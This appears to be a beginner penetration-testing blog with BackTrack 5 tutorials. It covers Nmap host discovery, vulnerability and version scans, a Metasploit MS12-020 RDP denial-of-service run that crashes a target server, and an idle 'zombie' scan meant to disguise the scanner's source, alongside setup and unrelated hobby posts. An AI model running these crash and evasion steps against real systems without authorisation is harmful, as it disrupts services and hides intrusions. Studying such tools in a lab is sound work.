NMAP & Metasploit - Scan and Exploit in 10mins

READY, SCAN, ATTACK!!!

First, we will find a target and ensure the host is up. We will do this by using Nmap:
#nmap -sn 192.168.71.156

Once we know the host is up and running, we will use Nmap to find any critical vulnerabilities. We invoke the command

#nmap --script vuln 192.168.71.156 --reason

With this command, Nmap will execute the NSE script called Vuln and scan the host for vulnerabilities. Once the scan completed, we can see the result and show the available vulnerability of the host. The result even provide us with the link to know more information of the vulnerability.

Now lets exploit that vulnerability! So first we need to locate whether the exploit is in the metasploit database. On your terminal, run

#locate ms12_020

The output shows that the exploit is available in metasploit.

Alternatively, you can also search the exploit in the MSFconsole itself by firing up #msfconsole and then run

#search ms12_020

Now that we know the exploit is available, we will now execute it.

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf  auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.71.156

msf  auxiliary(ms12_020_maxchannelids) > set RPORT 3389

msf  auxiliary(ms12_020_maxchannelids) > run

Once executed, the server will crash!!! Note that this is a Layer 7 DOS attack!

Nmap & Metasploit - Finding a Zombie

Find a victim, make it a zombie and then use that zombie to bite it!

Many may not realize this but NMAP has the ability to turn a machine into a zombie (well not literally) and use it to perform scanning on other machines. This is another way to use the power of trust of another computer, 'take over' and scan it on the other. Besides, this is way more challenging than using the -D (decoy) switch.

Well, first its not easy to find a potential zombie using NMAP (if anyone has any idea, do share) so we are going to use Metasploit to find potential zombie machines.

Open your terminal and type in

#msfconsole

Once loaded, type

msf > use auxiliary/scanner/ip/ipidseq 

If you wanna see the available options, enter below;

msf auxiliary(ipidseq) > show options

Then lets put in the IP range for them to scan and find potential zombies

msf auxiliary(ipidseq) > set RHOSTS 192,168.71.150-192.168.71.153

msf auxiliary(ipidseq) > set THREADS 50

msf auxiliary(ipidseq) > run

Once ran, the result will be shown and if you see an IP with the remark as 'Incremental!' it means you have a potential zombie!!!!!

So once a potential zombie is found, rifle up the nmap and run the scan 

#nmap -PN -sI <zombie IP> <victim IP>

Basically, what this scan does is to scan another machine using the zombie machine that somehow acts like a proxy. 

In what situation can we apply this?

Let's say you are in the same network but you can perform a scan to a server but the other person beside you can because he is 'trusted' or given special privileges. So the only way is to connect to his machine and use it to scan the server instead. From the server network side, they will see it as a valid traffic NOT from the 'attacker' but from the trusted Zombie itself. :)

Nmap - Finding Open Ports, Services and its Versions + more Juice Info!!

If you are in a restaurant, chances are you are going to order something to eat.

Nmap does more than just scanning for ports, it can also scan the system for the version of the services running against that ports. There are many scanners to do that but i prefer Nmap personally because of its lightweight.

So a typical Nmap scan without any switches will find the open ports and the services running against it. Below is a standard output of a successful completed Nmap scan.

If we want to see more juicy information in detail and the versions of the services running on them, simply input the switch A to the command. A simple switch gives a huge difference.

Look at the details (in the yellow box) of what Nmap -A can provide:

In time to come, i will show how Nmap -A in conjunction with other switches to display more details than i imagined before.

Physical Project - Making a Box to safe keep the Wires

All i need is a box, scissors, markers and pencil.

The Problem:

The Tools:

 The Work:

The Finish:

Nmap - Determining if the Host is Up

Hello! Are you there? I know your door is locked but i can tell if you are hiding. :)

Some websites disable ICMP so that when people try to Ping the website or the IP address of the website, it will respond with 'Request Timed Out'.

Nmap has the capability to find out whether the host is up despite not being able to ping. 

Open terminal and type #nmap -sn <IP>

As you can see, nmap shows the reply as '1 host up'. :)

Fun with Command on Linux - Changing Resolution

I'm a RESOLUTIONIST! :P

Though you can change the resolution through the GUI in either KDE or GNOME, nothing is sexier than running it through the command line. So here we go,

Open the terminal and type in #xrandr and enter

It will list all the possible resolution sizes that you can play test around.

Type #xrandr -s 1280x720 and enter

BackTrack 5 - Removing and Installing Metasploit Framework

Remove and Reinstall!!!

The reason why i remove Metasploit is because based on experience, Metasploit has some issues running certain things properly when it first installed. Hence its best to remove it and then reinstall it.

Open the terminal and type #apt-get remove metasploit

Reinstall it by running #apt-get install metasploit

Once installed type in #msfconsole

Backtrack 5 - Upgrade Firefox to the latest version

Oh Firefox! Time for an Upgrade!

Upgrading Firefox to the latest version. Click Applications > Internet > Firefox Web Browser

Click on Help > About Firefox

Click on Apply Update

There you go... Firefox upgraded to v21.0 from 14.0.1

Getting started - Installing BackTrack5r3 on VMware Workstation 8.

In the previous tutorial, we run our BackTrack on VMware. Now we want to install it on VMware so that we dont have to run it on the .iso file and able to create files and folders on it.

Run your BackTrack VM and log in to the account. On the desktop, click on 'Install BackTrack'

Choose your preferred language and click Forward

Choose your region and click Forward

Choose your Keyboard layout and click Forward

By default, BackTrack will use all available disk allocated during the setup. Click Forward

Click Install

Installation will take between 20mins to 40mins.

Once completed, click Restart Now

Click Enter

The VM will reboot and once you login to your account and run the #startx, you will get your GUI. You can further test your installation by removing the .iso from the VM settings and start it to see if BackTrack can run without the .iso file.

Cheers. :)

Getting started - Running BackTrack5r3 on VMware Workstation 8.

First and foremost, let's download the .iso file from the main website to our host machine.

http://www.backtrack-linux.org/backtrack/backtrack-5-r3-released/

Once downloaded, start up our VMware workstation and click on File > New Virtual Machine

Click Next for the Typical setup

Browse to the .iso file that we downloaded just now and click Next

Choose Linux and since BackTrack 5 runs in Ubuntu, we shall choose Ubuntu as the version.

Give a name to our Virtual machine and choose the location on where the files should reside then click Next

Choose the size we want to allocate for our Virtual Machine. *Its better to allocate more space for it as later we are going to install it so that it will not run from the .iso file anymore.

Check the settings and click Finish

Click Enter

Choose the first option

The default login is 'root' and the default password is 'toor'

Once username and password is entered, type #startx

BackTrack will now load into its GUI

There.... you have now successfully launched BackTrack5r3 on your virtual machine. Next tutorial will be on how to install BackTrack into the VM so that we do not have to run it using the .iso file.